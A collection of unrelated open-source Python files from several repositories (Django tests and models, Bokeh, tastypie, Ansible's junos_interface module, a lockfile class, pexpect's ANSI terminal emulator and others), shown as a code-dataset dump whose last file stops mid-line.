print("done") print() print("Classification performance:") print("===========================") print() print("%s %s %s %s" % ("Classifier ", "train-time", "test-time", "Accuracy")) print("-" * 44) for name in sorted(accuracy, key=accuracy.get): print("%s %s %s %s" % (name.ljust(16), ("%.4fs" % train_time[name]).center(10), ("%.4fs" % test_time[name]).center(10), ("%.4f" % accuracy[name]).center(10))) print()
darkryder/django
refs/heads/master
tests/template_tests/filter_tests/test_upper.py
388
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.template.defaultfilters import upper from django.test import SimpleTestCase from django.utils.safestring import mark_safe from ..utils import setup class UpperTests(SimpleTestCase): """ The "upper" filter messes up entities (which are case-sensitive), so it's not safe for non-escaping purposes. """ @setup({'upper01': '{% autoescape off %}{{ a|upper }} {{ b|upper }}{% endautoescape %}'}) def test_upper01(self): output = self.engine.render_to_string('upper01', {'a': 'a & b', 'b': mark_safe('a &amp; b')}) self.assertEqual(output, 'A & B A &AMP; B') @setup({'upper02': '{{ a|upper }} {{ b|upper }}'}) def test_upper02(self): output = self.engine.render_to_string('upper02', {'a': 'a & b', 'b': mark_safe('a &amp; b')}) self.assertEqual(output, 'A &amp; B A &amp;AMP; B') class FunctionTests(SimpleTestCase): def test_upper(self): self.assertEqual(upper('Mixed case input'), 'MIXED CASE INPUT') def test_unicode(self): # lowercase e umlaut self.assertEqual(upper('\xeb'), '\xcb') def test_non_string_input(self): self.assertEqual(upper(123), '123')
pooya/disco
refs/heads/master
examples/faq/chain.py
11
from disco.job import Job from disco.worker.task_io import chain_reader class FirstJob(Job): input = ['raw://0', 'raw://0'] @staticmethod def map(line, params): yield int(line) + 1, "" class ChainJob(Job): map_reader = staticmethod(chain_reader) @staticmethod def map(key_value, params): yield int(key_value[0]) + 1, key_value[1] if __name__ == "__main__": # Jobs cannot belong to __main__ modules. So, import this very # file to access the above classes. import chain last = chain.FirstJob().run() for i in range(9): last = chain.ChainJob().run(input=last.wait()) print(last.name)
huongttlan/bokeh
refs/heads/master
tests/glyphs/Diamond.py
43
import numpy as np from bokeh.document import Document from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid from bokeh.models.markers import Diamond from bokeh.plotting import show N = 9 x = np.linspace(-2, 2, N) y = x**2 sizes = np.linspace(10, 20, N) source = ColumnDataSource(dict(x=x, y=y, sizes=sizes)) xdr = DataRange1d() ydr = DataRange1d() plot = Plot( title=None, x_range=xdr, y_range=ydr, plot_width=300, plot_height=300, h_symmetry=False, v_symmetry=False, min_border=0, toolbar_location=None) glyph = Diamond(x="x", y="y", size="sizes", line_color="#1c9099", line_width=2, fill_color=None) plot.add_glyph(source, glyph) xaxis = LinearAxis() plot.add_layout(xaxis, 'below') yaxis = LinearAxis() plot.add_layout(yaxis, 'left') plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker)) plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker)) doc = Document() doc.add(plot) show(plot)
glencoates/django-tastypie
refs/heads/master
tests/related_resource/api/resources.py
16
from django.contrib.auth.models import User from tastypie import fields from tastypie.resources import ModelResource from tastypie.authorization import Authorization from core.models import Note, MediaBit from related_resource.models import Category, Tag, ExtraData, Taggable, TaggableTag class UserResource(ModelResource): class Meta: resource_name = 'users' queryset = User.objects.all() allowed_methods = ['get'] class NoteResource(ModelResource): author = fields.ForeignKey(UserResource, 'author') class Meta: resource_name = 'notes' queryset = Note.objects.all() authorization = Authorization() class CategoryResource(ModelResource): parent = fields.ToOneField('self', 'parent', null=True) class Meta: resource_name = 'category' queryset = Category.objects.all() authorization = Authorization() class TagResource(ModelResource): taggabletags = fields.ToManyField( 'related_resource.api.resources.TaggableTagResource', 'taggabletags', null=True) extradata = fields.ToOneField( 'related_resource.api.resources.ExtraDataResource', 'extradata', null=True, blank=True, full=True) class Meta: resource_name = 'tag' queryset = Tag.objects.all() authorization = Authorization() class TaggableResource(ModelResource): taggabletags = fields.ToManyField( 'related_resource.api.resources.TaggableTagResource', 'taggabletags', null=True) class Meta: resource_name = 'taggable' queryset = Taggable.objects.all() authorization = Authorization() class TaggableTagResource(ModelResource): tag = fields.ToOneField( 'related_resource.api.resources.TagResource', 'tag', null=True) taggable = fields.ToOneField( 'related_resource.api.resources.TaggableResource', 'taggable', null=True) class Meta: resource_name = 'taggabletag' queryset = TaggableTag.objects.all() authorization = Authorization() class ExtraDataResource(ModelResource): tag = fields.ToOneField( 'related_resource.api.resources.TagResource', 'tag', null=True) class Meta: resource_name = 'extradata' queryset = ExtraData.objects.all() authorization = Authorization() class FreshNoteResource(ModelResource): media_bits = fields.ToManyField('related_resource.api.resources.FreshMediaBitResource', 'media_bits', related_name='note') class Meta: queryset = Note.objects.all() resource_name = 'freshnote' authorization = Authorization() class FreshMediaBitResource(ModelResource): note = fields.ToOneField(FreshNoteResource, 'note') class Meta: queryset = MediaBit.objects.all() resource_name = 'freshmediabit' authorization = Authorization()
roderickm/MediaCrush
refs/heads/master
migrate.py
2
from mediacrush.objects import File, RedisObject from mediacrush.database import r, _k from mediacrush.fileutils import file_storage from mediacrush.processing.invocation import Invocation from mediacrush.config import _cfg, _cfgi import sys import json if __name__ == '__main__': files = File.get_all() count = len(files) print "About to process %d files." % count done = 0 errors = [] for f in files: h = f.hash k = _k("file.%s" % h) r.hset(k, "ip", "") print "\n%d/%d files processed, errors:" % (done, count), errors def normalise_processor(processor): if not processor: return None return processor.split("/")[0] if "/" in processor else processor
yakky/django
refs/heads/master
tests/model_fields/models.py
210
import os import tempfile import uuid from django.contrib.contenttypes.fields import ( GenericForeignKey, GenericRelation, ) from django.contrib.contenttypes.models import ContentType from django.core.files.storage import FileSystemStorage from django.db import models from django.db.models.fields.files import ImageField, ImageFieldFile from django.db.models.fields.related import ( ForeignKey, ForeignObject, ManyToManyField, OneToOneField, ) from django.utils import six try: from PIL import Image except ImportError: Image = None class Foo(models.Model): a = models.CharField(max_length=10) d = models.DecimalField(max_digits=5, decimal_places=3) def get_foo(): return Foo.objects.get(id=1).pk class Bar(models.Model): b = models.CharField(max_length=10) a = models.ForeignKey(Foo, models.CASCADE, default=get_foo, related_name=b'bars') class Whiz(models.Model): CHOICES = ( ('Group 1', ( (1, 'First'), (2, 'Second'), ) ), ('Group 2', ( (3, 'Third'), (4, 'Fourth'), ) ), (0, 'Other'), ) c = models.IntegerField(choices=CHOICES, null=True) class Counter(six.Iterator): def __init__(self): self.n = 1 def __iter__(self): return self def __next__(self): if self.n > 5: raise StopIteration else: self.n += 1 return (self.n, 'val-' + str(self.n)) class WhizIter(models.Model): c = models.IntegerField(choices=Counter(), null=True) class WhizIterEmpty(models.Model): c = models.CharField(choices=(x for x in []), blank=True, max_length=1) class BigD(models.Model): d = models.DecimalField(max_digits=38, decimal_places=30) class FloatModel(models.Model): size = models.FloatField() class BigS(models.Model): s = models.SlugField(max_length=255) class UnicodeSlugField(models.Model): s = models.SlugField(max_length=255, allow_unicode=True) class SmallIntegerModel(models.Model): value = models.SmallIntegerField() class IntegerModel(models.Model): value = models.IntegerField() class BigIntegerModel(models.Model): value = models.BigIntegerField() null_value = models.BigIntegerField(null=True, blank=True) class PositiveSmallIntegerModel(models.Model): value = models.PositiveSmallIntegerField() class PositiveIntegerModel(models.Model): value = models.PositiveIntegerField() class Post(models.Model): title = models.CharField(max_length=100) body = models.TextField() class NullBooleanModel(models.Model): nbfield = models.NullBooleanField() class BooleanModel(models.Model): bfield = models.BooleanField(default=None) string = models.CharField(max_length=10, default='abc') class DateTimeModel(models.Model): d = models.DateField() dt = models.DateTimeField() t = models.TimeField() class DurationModel(models.Model): field = models.DurationField() class NullDurationModel(models.Model): field = models.DurationField(null=True) class PrimaryKeyCharModel(models.Model): string = models.CharField(max_length=10, primary_key=True) class FksToBooleans(models.Model): """Model with FKs to models with {Null,}BooleanField's, #15040""" bf = models.ForeignKey(BooleanModel, models.CASCADE) nbf = models.ForeignKey(NullBooleanModel, models.CASCADE) class FkToChar(models.Model): """Model with FK to a model with a CharField primary key, #19299""" out = models.ForeignKey(PrimaryKeyCharModel, models.CASCADE) class RenamedField(models.Model): modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),)) class VerboseNameField(models.Model): id = models.AutoField("verbose pk", primary_key=True) field1 = models.BigIntegerField("verbose field1") field2 = models.BooleanField("verbose field2", default=False) field3 = models.CharField("verbose field3", max_length=10) field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99) field5 = models.DateField("verbose field5") field6 = models.DateTimeField("verbose field6") field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1) field8 = models.EmailField("verbose field8") field9 = models.FileField("verbose field9", upload_to="unused") field10 = models.FilePathField("verbose field10") field11 = models.FloatField("verbose field11") # Don't want to depend on Pillow in this test # field_image = models.ImageField("verbose field") field12 = models.IntegerField("verbose field12") field13 = models.GenericIPAddressField("verbose field13", protocol="ipv4") field14 = models.NullBooleanField("verbose field14") field15 = models.PositiveIntegerField("verbose field15") field16 = models.PositiveSmallIntegerField("verbose field16") field17 = models.SlugField("verbose field17") field18 = models.SmallIntegerField("verbose field18") field19 = models.TextField("verbose field19") field20 = models.TimeField("verbose field20") field21 = models.URLField("verbose field21") field22 = models.UUIDField("verbose field22") field23 = models.DurationField("verbose field23") class GenericIPAddress(models.Model): ip = models.GenericIPAddressField(null=True, protocol='ipv4') ############################################################################### # These models aren't used in any test, just here to ensure they validate # successfully. # See ticket #16570. class DecimalLessThanOne(models.Model): d = models.DecimalField(max_digits=3, decimal_places=3) # See ticket #18389. class FieldClassAttributeModel(models.Model): field_class = models.CharField ############################################################################### class DataModel(models.Model): short_data = models.BinaryField(max_length=10, default=b'\x08') data = models.BinaryField() ############################################################################### # FileField class Document(models.Model): myfile = models.FileField(upload_to='unused') ############################################################################### # ImageField # If Pillow available, do these tests. if Image: class TestImageFieldFile(ImageFieldFile): """ Custom Field File class that records whether or not the underlying file was opened. """ def __init__(self, *args, **kwargs): self.was_opened = False super(TestImageFieldFile, self).__init__(*args, **kwargs) def open(self): self.was_opened = True super(TestImageFieldFile, self).open() class TestImageField(ImageField): attr_class = TestImageFieldFile # Set up a temp directory for file storage. temp_storage_dir = tempfile.mkdtemp() temp_storage = FileSystemStorage(temp_storage_dir) temp_upload_to_dir = os.path.join(temp_storage.location, 'tests') class Person(models.Model): """ Model that defines an ImageField with no dimension fields. """ name = models.CharField(max_length=50) mugshot = TestImageField(storage=temp_storage, upload_to='tests') class AbsctractPersonWithHeight(models.Model): """ Abstract model that defines an ImageField with only one dimension field to make sure the dimension update is correctly run on concrete subclass instance post-initialization. """ mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height') mugshot_height = models.PositiveSmallIntegerField() class Meta: abstract = True class PersonWithHeight(AbsctractPersonWithHeight): """ Concrete model that subclass an abctract one with only on dimension field. """ name = models.CharField(max_length=50) class PersonWithHeightAndWidth(models.Model): """ Model that defines height and width fields after the ImageField. """ name = models.CharField(max_length=50) mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height', width_field='mugshot_width') mugshot_height = models.PositiveSmallIntegerField() mugshot_width = models.PositiveSmallIntegerField() class PersonDimensionsFirst(models.Model): """ Model that defines height and width fields before the ImageField. """ name = models.CharField(max_length=50) mugshot_height = models.PositiveSmallIntegerField() mugshot_width = models.PositiveSmallIntegerField() mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height', width_field='mugshot_width') class PersonTwoImages(models.Model): """ Model that: * Defines two ImageFields * Defines the height/width fields before the ImageFields * Has a nullalble ImageField """ name = models.CharField(max_length=50) mugshot_height = models.PositiveSmallIntegerField() mugshot_width = models.PositiveSmallIntegerField() mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height', width_field='mugshot_width') headshot_height = models.PositiveSmallIntegerField( blank=True, null=True) headshot_width = models.PositiveSmallIntegerField( blank=True, null=True) headshot = TestImageField(blank=True, null=True, storage=temp_storage, upload_to='tests', height_field='headshot_height', width_field='headshot_width') class AllFieldsModel(models.Model): big_integer = models.BigIntegerField() binary = models.BinaryField() boolean = models.BooleanField(default=False) char = models.CharField(max_length=10) csv = models.CommaSeparatedIntegerField(max_length=10) date = models.DateField() datetime = models.DateTimeField() decimal = models.DecimalField(decimal_places=2, max_digits=2) duration = models.DurationField() email = models.EmailField() file_path = models.FilePathField() floatf = models.FloatField() integer = models.IntegerField() generic_ip = models.GenericIPAddressField() null_boolean = models.NullBooleanField() positive_integer = models.PositiveIntegerField() positive_small_integer = models.PositiveSmallIntegerField() slug = models.SlugField() small_integer = models.SmallIntegerField() text = models.TextField() time = models.TimeField() url = models.URLField() uuid = models.UUIDField() fo = ForeignObject( 'self', on_delete=models.CASCADE, from_fields=['abstract_non_concrete_id'], to_fields=['id'], related_name='reverse' ) fk = ForeignKey( 'self', models.CASCADE, related_name='reverse2' ) m2m = ManyToManyField('self') oto = OneToOneField('self', models.CASCADE) object_id = models.PositiveIntegerField() content_type = models.ForeignKey(ContentType, models.CASCADE) gfk = GenericForeignKey() gr = GenericRelation(DataModel) ############################################################################### class UUIDModel(models.Model): field = models.UUIDField() class NullableUUIDModel(models.Model): field = models.UUIDField(blank=True, null=True) class PrimaryKeyUUIDModel(models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4) class RelatedToUUIDModel(models.Model): uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel', models.CASCADE) class UUIDChild(PrimaryKeyUUIDModel): pass class UUIDGrandchild(UUIDChild): pass
judotens/jongos
refs/heads/master
lockfile/symlinklockfile.py
12
from __future__ import absolute_import import time import os from . import (LockBase, LockFailed, NotLocked, NotMyLock, LockTimeout, AlreadyLocked) class SymlinkLockFile(LockBase): """Lock access to a file using symlink(2).""" def __init__(self, path, threaded=True, timeout=None): # super(SymlinkLockFile).__init(...) LockBase.__init__(self, path, threaded, timeout) # split it back! self.unique_name = os.path.split(self.unique_name)[1] def acquire(self, timeout=None): # Hopefully unnecessary for symlink. #try: # open(self.unique_name, "wb").close() #except IOError: # raise LockFailed("failed to create %s" % self.unique_name) timeout = timeout or self.timeout end_time = time.time() if timeout is not None and timeout > 0: end_time += timeout while True: # Try and create a symbolic link to it. try: os.symlink(self.unique_name, self.lock_file) except OSError: # Link creation failed. Maybe we've double-locked? if self.i_am_locking(): # Linked to out unique name. Proceed. return else: # Otherwise the lock creation failed. if timeout is not None and time.time() > end_time: if timeout > 0: raise LockTimeout("Timeout waiting to acquire" " lock for %s" % self.path) else: raise AlreadyLocked("%s is already locked" % self.path) time.sleep(timeout/10 if timeout is not None else 0.1) else: # Link creation succeeded. We're good to go. return def release(self): if not self.is_locked(): raise NotLocked("%s is not locked" % self.path) elif not self.i_am_locking(): raise NotMyLock("%s is locked, but not by me" % self.path) os.unlink(self.lock_file) def is_locked(self): return os.path.islink(self.lock_file) def i_am_locking(self): return os.path.islink(self.lock_file) and \ os.readlink(self.lock_file) == self.unique_name def break_lock(self): if os.path.islink(self.lock_file): # exists && link os.unlink(self.lock_file)
sriharrsha/flipside.io
refs/heads/master
vendor/guzzlehttp/ringphp/docs/conf.py
321
import sys, os import sphinx_rtd_theme from sphinx.highlighting import lexers from pygments.lexers.web import PhpLexer lexers['php'] = PhpLexer(startinline=True, linenos=1) lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1) primary_domain = 'php' extensions = [] templates_path = ['_templates'] source_suffix = '.rst' master_doc = 'index' project = u'RingPHP' copyright = u'2014, Michael Dowling' version = '1.0.0-alpha' exclude_patterns = ['_build'] html_title = "RingPHP" html_short_title = "RingPHP" html_theme = "sphinx_rtd_theme" html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
caveman-dick/ansible
refs/heads/devel
lib/ansible/modules/network/junos/junos_interface.py
16
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2017, Ansible by Red Hat, inc # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'network'} DOCUMENTATION = """ --- module: junos_interface version_added: "2.4" author: "Ganesh Nalawade (@ganeshrn)" short_description: Manage Interface on Juniper JUNOS network devices description: - This module provides declarative management of Interfaces on Juniper JUNOS network devices. options: name: description: - Name of the Interface. required: true description: description: - Description of Interface. enabled: description: - Configure interface link status. speed: description: - Interface link speed. mtu: description: - Maximum size of transmit packet. duplex: description: - Interface link status. default: auto choices: ['full', 'half', 'auto'] tx_rate: description: - Transmit rate in bits per second (bps). rx_rate: description: - Receiver rate in bits per second (bps). neighbors: description: - Check the operational state of given interface C(name) for LLDP neighbor. - The following suboptions are available. suboptions: host: description: - "LLDP neighbor host for given interface C(name)." port: description: - "LLDP neighbor port to which given interface C(name) is connected." delay: description: - Time in seconds to wait before checking for the operational state on remote device. This wait is applicable for operational state argument which are I(state) with values C(up)/C(down), I(tx_rate) and I(rx_rate). default: 10 aggregate: description: List of Interfaces definitions. state: description: - State of the Interface configuration, C(up) idicates present and operationally up and C(down) indicates present and operationally C(down) default: present choices: ['present', 'absent', 'up', 'down'] active: description: - Specifies whether or not the configuration is active or deactivated default: True choices: [True, False] requirements: - ncclient (>=v0.5.2) notes: - This module requires the netconf system service be enabled on the remote device being managed. - Tested against vSRX JUNOS version 15.1X49-D15.4, vqfx-10000 JUNOS Version 15.1X53-D60.4. """ EXAMPLES = """ - name: configure interface junos_interface: name: ge-0/0/1 description: test-interface - name: remove interface junos_interface: name: ge-0/0/1 state: absent - name: make interface down junos_interface: name: ge-0/0/1 enabled: False - name: make interface up junos_interface: name: ge-0/0/1 enabled: True - name: Deactivate interface config junos_interface: name: ge-0/0/1 state: present active: False - name: Activate interface config net_interface: name: ge-0/0/1 state: present active: True - name: Configure interface speed, mtu, duplex junos_interface: name: ge-0/0/1 state: present speed: 1g mtu: 256 duplex: full - name: Create interface using aggregate junos_interface: aggregate: - name: ge-0/0/1 description: test-interface-1 - name: ge-0/0/2 description: test-interface-2 speed: 1g duplex: full mtu: 512 - name: Delete interface using aggregate junos_interface: aggregate: - name: ge-0/0/1 - name: ge-0/0/2 state: absent - name: Check intent arguments junos_interface: name: "{{ name }}" state: up tx_rate: ge(0) rx_rate: le(0) - name: Check neighbor intent junos_interface: name: xe-0/1/1 neighbors: - port: Ethernet1/0/1 host: netdev - name: Config + intent junos_interface: name: "{{ name }}" enabled: False state: down """ RETURN = """ diff.prepared: description: Configuration difference before and after applying change. returned: when configuration is changed and diff option is enabled. type: string sample: > [edit interfaces] + ge-0/0/1 { + description test-interface; + } """ import collections from copy import deepcopy from time import sleep from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.netconf import send_request from ansible.module_utils.network_common import remove_default_spec from ansible.module_utils.network_common import conditional from ansible.module_utils.junos import junos_argument_spec, check_args from ansible.module_utils.junos import load_config, map_params_to_obj, map_obj_to_ele from ansible.module_utils.junos import commit_configuration, discard_changes, locked_config, to_param_list try: from lxml.etree import Element, SubElement, tostring except ImportError: from xml.etree.ElementTree import Element, SubElement, tostring USE_PERSISTENT_CONNECTION = True def validate_mtu(value, module): if value and not 256 <= value <= 9192: module.fail_json(msg='mtu must be between 256 and 9192') def validate_param_values(module, obj, param=None): if not param: param = module.params for key in obj: # validate the param value (if validator func exists) validator = globals().get('validate_%s' % key) if callable(validator): validator(param.get(key), module) def main(): """ main entry point for module execution """ neighbors_spec = dict( host=dict(), port=dict() ) element_spec = dict( name=dict(), description=dict(), enabled=dict(default=True, type='bool'), speed=dict(), mtu=dict(type='int'), duplex=dict(choices=['full', 'half', 'auto']), tx_rate=dict(), rx_rate=dict(), neighbors=dict(type='list', elements='dict', options=neighbors_spec), delay=dict(default=10, type='int'), state=dict(default='present', choices=['present', 'absent', 'up', 'down']), active=dict(default=True, type='bool') ) aggregate_spec = deepcopy(element_spec) aggregate_spec['name'] = dict(required=True) # remove default in aggregate spec, to handle common arguments remove_default_spec(aggregate_spec) argument_spec = dict( aggregate=dict(type='list', elements='dict', options=aggregate_spec), ) argument_spec.update(element_spec) argument_spec.update(junos_argument_spec) required_one_of = [['name', 'aggregate']] mutually_exclusive = [['name', 'aggregate']] module = AnsibleModule(argument_spec=argument_spec, required_one_of=required_one_of, mutually_exclusive=mutually_exclusive, supports_check_mode=True) warnings = list() check_args(module, warnings) result = {'changed': False} if warnings: result['warnings'] = warnings top = 'interfaces/interface' param_to_xpath_map = collections.OrderedDict() param_to_xpath_map.update([ ('name', {'xpath': 'name', 'is_key': True}), ('description', 'description'), ('speed', 'speed'), ('mtu', 'mtu'), ('duplex', 'link-mode'), ('disable', {'xpath': 'disable', 'tag_only': True}) ]) choice_to_value_map = { 'link-mode': {'full': 'full-duplex', 'half': 'half-duplex', 'auto': 'automatic'} } params = to_param_list(module) requests = list() for param in params: # if key doesn't exist in the item, get it from module.params for key in param: if param.get(key) is None: param[key] = module.params[key] item = param.copy() state = item.get('state') item['disable'] = True if not item.get('enabled') else False if state in ('present', 'up', 'down'): item['state'] = 'present' validate_param_values(module, param_to_xpath_map, param=item) want = map_params_to_obj(module, param_to_xpath_map, param=item) requests.append(map_obj_to_ele(module, want, top, value_map=choice_to_value_map, param=item)) diff = None with locked_config(module): for req in requests: diff = load_config(module, tostring(req), warnings, action='merge') # issue commit after last configuration change is done commit = not module.check_mode if diff: if commit: commit_configuration(module) else: discard_changes(module) result['changed'] = True if module._diff: result['diff'] = {'prepared': diff} failed_conditions = [] neighbors = None for item in params: state = item.get('state') tx_rate = item.get('tx_rate') rx_rate = item.get('rx_rate') want_neighbors = item.get('neighbors') if state not in ('up', 'down') and tx_rate is None and rx_rate is None and want_neighbors is None: continue element = Element('get-interface-information') intf_name = SubElement(element, 'interface-name') intf_name.text = item.get('name') if result['changed']: sleep(item.get('delay')) reply = send_request(module, element, ignore_warning=False) if state in ('up', 'down'): admin_status = reply.xpath('interface-information/physical-interface/admin-status') if not admin_status or not conditional(state, admin_status[0].text.strip()): failed_conditions.append('state ' + 'eq(%s)' % state) if tx_rate: output_bps = reply.xpath('interface-information/physical-interface/traffic-statistics/output-bps') if not output_bps or not conditional(tx_rate, output_bps[0].text.strip(), cast=int): failed_conditions.append('tx_rate ' + tx_rate) if rx_rate: input_bps = reply.xpath('interface-information/physical-interface/traffic-statistics/input-bps') if not input_bps or not conditional(rx_rate, input_bps[0].text.strip(), cast=int): failed_conditions.append('rx_rate ' + rx_rate) if want_neighbors: if neighbors is None: element = Element('get-lldp-interface-neighbors') intf_name = SubElement(element, 'interface-device') intf_name.text = item.get('name') reply = send_request(module, element, ignore_warning=False) have_host = [item.text for item in reply.xpath('lldp-neighbors-information/lldp-neighbor-information/lldp-remote-system-name')] have_port = [item.text for item in reply.xpath('lldp-neighbors-information/lldp-neighbor-information/lldp-remote-port-id')] for neighbor in want_neighbors: host = neighbor.get('host') port = neighbor.get('port') if host and host not in have_host: failed_conditions.append('host ' + host) if port and port not in have_port: failed_conditions.append('port ' + port) if failed_conditions: msg = 'One or more conditional statements have not be satisfied' module.fail_json(msg=msg, failed_conditions=failed_conditions) module.exit_json(**result) if __name__ == "__main__": main()
XXMrHyde/android_external_chromium_org
refs/heads/darkkat-4.4
third_party/pexpect/ANSI.py
171
"""This implements an ANSI (VT100) terminal emulator as a subclass of screen. PEXPECT LICENSE This license is approved by the OSI and FSF as GPL-compatible. http://opensource.org/licenses/isc-license.txt Copyright (c) 2012, Noah Spurrier <noah@noah.org> PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. """ # references: # http://en.wikipedia.org/wiki/ANSI_escape_code # http://www.retards.org/terminals/vt102.html # http://vt100.net/docs/vt102-ug/contents.html # http://vt100.net/docs/vt220-rm/ # http://www.termsys.demon.co.uk/vtansi.htm import screen import FSM import copy import string # # The 'Do.*' functions are helper functions for the ANSI class. # def DoEmit (fsm): screen = fsm.memory[0] screen.write_ch(fsm.input_symbol) def DoStartNumber (fsm): fsm.memory.append (fsm.input_symbol) def DoBuildNumber (fsm): ns = fsm.memory.pop() ns = ns + fsm.input_symbol fsm.memory.append (ns) def DoBackOne (fsm): screen = fsm.memory[0] screen.cursor_back () def DoBack (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_back (count) def DoDownOne (fsm): screen = fsm.memory[0] screen.cursor_down () def DoDown (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_down (count) def DoForwardOne (fsm): screen = fsm.memory[0] screen.cursor_forward () def DoForward (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_forward (count) def DoUpReverse (fsm): screen = fsm.memory[0] screen.cursor_up_reverse() def DoUpOne (fsm): screen = fsm.memory[0] screen.cursor_up () def DoUp (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_up (count) def DoHome (fsm): c = int(fsm.memory.pop()) r = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_home (r,c) def DoHomeOrigin (fsm): c = 1 r = 1 screen = fsm.memory[0] screen.cursor_home (r,c) def DoEraseDown (fsm): screen = fsm.memory[0] screen.erase_down() def DoErase (fsm): arg = int(fsm.memory.pop()) screen = fsm.memory[0] if arg == 0: screen.erase_down() elif arg == 1: screen.erase_up() elif arg == 2: screen.erase_screen() def DoEraseEndOfLine (fsm): screen = fsm.memory[0] screen.erase_end_of_line() def DoEraseLine (fsm): arg = int(fsm.memory.pop()) screen = fsm.memory[0] if arg == 0: screen.erase_end_of_line() elif arg == 1: screen.erase_start_of_line() elif arg == 2: screen.erase_line() def DoEnableScroll (fsm): screen = fsm.memory[0] screen.scroll_screen() def DoCursorSave (fsm): screen = fsm.memory[0] screen.cursor_save_attrs() def DoCursorRestore (fsm): screen = fsm.memory[0] screen.cursor_restore_attrs() def DoScrollRegion (fsm): screen = fsm.memory[0] r2 = int(fsm.memory.pop()) r1 = int(fsm.memory.pop()) screen.scroll_screen_rows (r1,r2) def DoMode (fsm): screen = fsm.memory[0] mode = fsm.memory.pop() # Should be 4 # screen.setReplaceMode () def DoLog (fsm): screen = fsm.memory[0] fsm.memory = [screen] fout = open ('log', 'a') fout.write (fsm.input_symbol + ',' + fsm.current_state + '\n') fout.close() class term (screen.screen): """This class is an abstract, generic terminal. This does nothing. This is a placeholder that provides a common base class for other terminals such as an ANSI terminal. """ def __init__ (self, r=24, c=80): screen.screen.__init__(self, r,c) class ANSI (term): """This class implements an ANSI (VT100) terminal. It is a stream filter that recognizes ANSI terminal escape sequences and maintains the state of a screen object. """ def __init__ (self, r=24,c=80): term.__init__(self,r,c) #self.screen = screen (24,80) self.state = FSM.FSM ('INIT',[self]) self.state.set_default_transition (DoLog, 'INIT') self.state.add_transition_any ('INIT', DoEmit, 'INIT') self.state.add_transition ('\x1b', 'INIT', None, 'ESC') self.state.add_transition_any ('ESC', DoLog, 'INIT') self.state.add_transition ('(', 'ESC', None, 'G0SCS') self.state.add_transition (')', 'ESC', None, 'G1SCS') self.state.add_transition_list ('AB012', 'G0SCS', None, 'INIT') self.state.add_transition_list ('AB012', 'G1SCS', None, 'INIT') self.state.add_transition ('7', 'ESC', DoCursorSave, 'INIT') self.state.add_transition ('8', 'ESC', DoCursorRestore, 'INIT') self.state.add_transition ('M', 'ESC', DoUpReverse, 'INIT') self.state.add_transition ('>', 'ESC', DoUpReverse, 'INIT') self.state.add_transition ('<', 'ESC', DoUpReverse, 'INIT') self.state.add_transition ('=', 'ESC', None, 'INIT') # Selects application keypad. self.state.add_transition ('#', 'ESC', None, 'GRAPHICS_POUND') self.state.add_transition_any ('GRAPHICS_POUND', None, 'INIT') self.state.add_transition ('[', 'ESC', None, 'ELB') # ELB means Escape Left Bracket. That is ^[[ self.state.add_transition ('H', 'ELB', DoHomeOrigin, 'INIT') self.state.add_transition ('D', 'ELB', DoBackOne, 'INIT') self.state.add_transition ('B', 'ELB', DoDownOne, 'INIT') self.state.add_transition ('C', 'ELB', DoForwardOne, 'INIT') self.state.add_transition ('A', 'ELB', DoUpOne, 'INIT') self.state.add_transition ('J', 'ELB', DoEraseDown, 'INIT') self.state.add_transition ('K', 'ELB', DoEraseEndOfLine, 'INIT') self.state.add_transition ('r', 'ELB', DoEnableScroll, 'INIT') self.state.add_transition ('m', 'ELB', None, 'INIT') self.state.add_transition ('?', 'ELB', None, 'MODECRAP') self.state.add_transition_list (string.digits, 'ELB', DoStartNumber, 'NUMBER_1') self.state.add_transition_list (string.digits, 'NUMBER_1', DoBuildNumber, 'NUMBER_1') self.state.add_transition ('D', 'NUMBER_1', DoBack, 'INIT') self.state.add_transition ('B', 'NUMBER_1', DoDown, 'INIT') self.state.add_transition ('C', 'NUMBER_1', DoForward, 'INIT') self.state.add_transition ('A', 'NUMBER_1', DoUp, 'INIT') self.state.add_transition ('J', 'NUMBER_1', DoErase, 'INIT') self.state.add_transition ('K', 'NUMBER_1', DoEraseLine, 'INIT') self.state.add_transition 